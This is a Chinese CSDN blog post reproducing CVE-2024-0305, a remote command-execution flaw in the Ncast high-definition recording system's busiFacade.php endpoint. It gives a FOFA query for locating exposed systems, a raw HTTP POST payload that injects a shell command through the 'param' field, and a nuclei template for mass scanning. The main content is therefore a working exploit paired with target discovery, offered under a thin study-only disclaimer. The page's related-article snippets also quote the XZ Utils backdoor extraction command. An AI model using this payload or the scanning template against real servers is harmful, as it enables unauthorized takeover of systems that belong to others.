Ncast-RCE(CVE-2024-0305)

最新推荐文章于 2024-10-08 21:32:38 发布
最新推荐文章于 2024-10-08 21:32:38 发布
阅读量372 收藏 4
点赞数 4
文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62352348/article/details/135906203
版权

免责声明:

本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!

漏洞描述

Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统,旨在提供高质量,高清定制的录播功能。该系统/classes/common/busiFacade.php接口存在RCE漏洞,攻击者可以构造恶意命令远控服务器。

fofa语句

app="Ncast-产品" && title=="高清智能录播系统"

漏洞复现

打开页面

1705981036787.png

构造payload

1705978428723.png

POST /classes/common/busiFacade.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 152
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

nuclei批量验证

1705981000010.png


id: Ncat-RCE-CVE-2024-0305

info:
  name: Ncast盈可视高清智能录播系统busiFacade RCE漏洞
  author: fgz
  severity: critical
  description: Ncast盈可视高清智能录播系统是一套新进的音视频录制和播放系统。该系统/classes/common/busiFacade.php接口存在RCE漏洞。
  metadata:
    max-request: 1
    fofa-query: app="Ncast-产品" && title=="高清智能录播系统"
    verified: true
http:
  - raw:
      - |-
        POST /classes/common/busiFacade.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
        Connection: close
        Content-Length: 91
        Accept: */*
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Requested-With: XMLHttpRequest

        {"name":"ping","serviceName":"SysManager","userTransaction":false,"param":["| echo hello"]}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - hello
      - type: status
        status:
          - 200

github poc总汇地址:https://github.com/AYcg/poc

长歌1001
关注
MajorDoMo thumb.php 未授权RCE漏洞复现(CNVD-2024-02175)
0xSec
04-16 922
MajorDoMo /modules/thumb/thumb.php接口处存在远程命令执行漏洞,未经身份验证的攻击者可利用此漏洞执行任意指令,获取服务器权限。
NCast:NCast C# SSDP 发现和内容投射 - Google Chromecast
06-14
NCast C# SSDP 发现和内容投射。 目前支持 LG TV 和 Google Chromecast 等渲染器。 public SSDPDiscovery Discovery = new SSDPDiscovery (); // Setup the event when a device is discovered Discovery . ...
万户OA某接口存在RCE漏洞-0day未公开漏洞
weixin_43167326的博客
02-02 528
万户软件网络是业内普遍认可的智慧政务办公专家,OA系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。
靶向安全研究的利器:CVE-2024-27804 开源项目详解
gitblog_00091的博客
06-23 472
靶向安全研究的利器:CVE-2024-27804 开源项目详解 项目地址:https://gitcode.com/R00tkitSMM/CVE-2024-27804 项目介绍 CVE-2024-27804 是一个针对特定操作系统(如 Darwin Kernel Version 23.2.0)的严重安全漏洞。这个开源项目提供了一个工具集,用于复现和分析该漏洞,帮助研究人员深入理解其工作原理,并为系统...
漏洞预警丨XZ Utilѕ工具库恶意后门植入漏洞(CVE-2024-3094)【内含自检方式】
C20220511的博客
04-02 1767
这条命令拼接后为:sed "r\n" ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d 2> /dev/null,主要从./tests/files/bad-3-corrupt_lzma2.xz中提取代码并解压,最后再执行。通过以上检查后,执行后门核心功能,主要功能是挂钩(HOOK)SSH登录认证过程中的函数RSA_public_decrypt,未授权执行指定的系统命令。
CVE-2024-22252、CVE-2024-22253、CVE-2024-22254,张口就来
2401_83740129的博客
04-03 966
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
Bens software projects.-开源
04-27
我的项目的主页:userinfo,pwmd,libpwmd,cboard,ncast,ezxradio和bubblegum。 还有VIM和EPIC脚本等代码片段。
Ncast_ADPRO6_智能录播解决方案.doc
06-16
Ncast_ADPRO6_智能录播解决方案
单位视频会议扩展方案.doc
09-16
- **高清录播系统**:NCAST NP-S3P 高清录播系统标准 B 版是一款专业级的录播设备,支持多路高清视频输入,具备智能跟踪、切换和录制功能。 - **其他设备**:根据实际需求,可能还包括高分辨率的投影仪或显示屏、...
2024年三个月网络安全(黑客技术)入门教程
2401_85027336的博客
09-25 2015
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)中的2到3个,都可以较好的胜任工作需求。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-29 1320
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
No.2 笔记 | 网络安全攻防:PC、CS工具与移动应用分析
l1x1n0的博客
10-05 1215
Cobalt Strike是一款基于Java的高级渗透测试工具,支持多人协同操作。它被称为"线上多人运动平台",功能强大且灵活。通过学习PC端和移动端的恶意程序利用技术,以及Cobalt Strike这一强大的渗透测试工具,我们不仅掌握了一些网络攻击的基本原理和技术,更重要的是提高了自身的网络安全意识。然而,我们必须时刻牢记,这些知识的学习目的是为了更好地理解和防御网络攻击,而非从事任何非法活动。作为负责任的网络公民,我们有义务遵守相关法律法规,保护自己和他人的网络安全
Web安全 - 重放攻击(Replay Attack)
小工匠
10-01 1412
重放攻击(Replay Attack)是一种网络攻击方式,攻击者通过截取并重复发送已经捕获的合法通信数据包,企图在受害者不知情的情况下冒充合法用户进行操作。这种攻击常见于不安全的网络协议中,攻击者无需破解通信内容,只需重发合法的消息即可造成安全威胁。重放攻击的潜在危害包括:未授权的交易执行、非法获取资源、数据泄露以及系统篡改等。随着网络系统的日益复杂,重放攻击仍然是一个常见的威胁,尤其是在不具备防御机制的旧协议或自定义通信方案中。使用缓存减少存储开销。利用异步处理避免阻塞主线程。
网络安全】利用XSS、OAuth配置错误实现token窃取及账户接管 (ATO)
最新发布
等风来
10-08 171
在过去,可以通过在两个子域名的 JavaScript 中显式设置 document.domain 来实现跨域访问,即在 sub1.target.com 和 auth.target.com 中都设置 document.domain = 'target.com';。这样,它们就共享了同一个源,浏览器将允许 JavaScript 之间的交互(例如相互访问变量、调用函数等)。
Web安全 - 路径穿越(Path Traversal)
小工匠
10-02 2453
路径穿越(Path Traversal)是一种Web应用漏洞,攻击者通过操控输入文件路径参数,以访问系统上未经授权的文件。通过路径穿越,攻击者可以使用诸如../的相对路径绕过访问限制,读取系统敏感信息或修改配置文件。
网络安全(黑客)——自学2024
2401_84466325的博客
09-28 2911
网络安全是一种综合性的概念,涵盖了保护计算机系统、网络基础设施和数据免受未经授权的访问、攻击、损害或盗窃的一系列措施和技术。经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
web安全】——SSRF服务器端请求伪造
wxh的博客
10-05 1136
SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)
网络安全的详细学习顺序
2401_87352036的博客
10-02 1489
网络安全的详细学习顺序可以按照由浅入深、逐步递进的原则进行。
网络安全 | JAVA代码审计】基础安全问题和解决方法初探
等风来
10-02 685
无占位符的预处理,其实质仍然是通过字符串拼接的方式来构造SQL语句,SQL注入依然存在,这是开发中需要谨记的。
ObjectArx自定义对象编程指南
例如,`ndesc()`静态成员函数返回类的类描述符对象,`ncast()`用于将对象转换为指定类型,`nisKindOf()`检查对象是否属于某个类或其派生类,`nisA()`则返回未知类对象的类描述符。这些函数在处理自定义对象时非常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值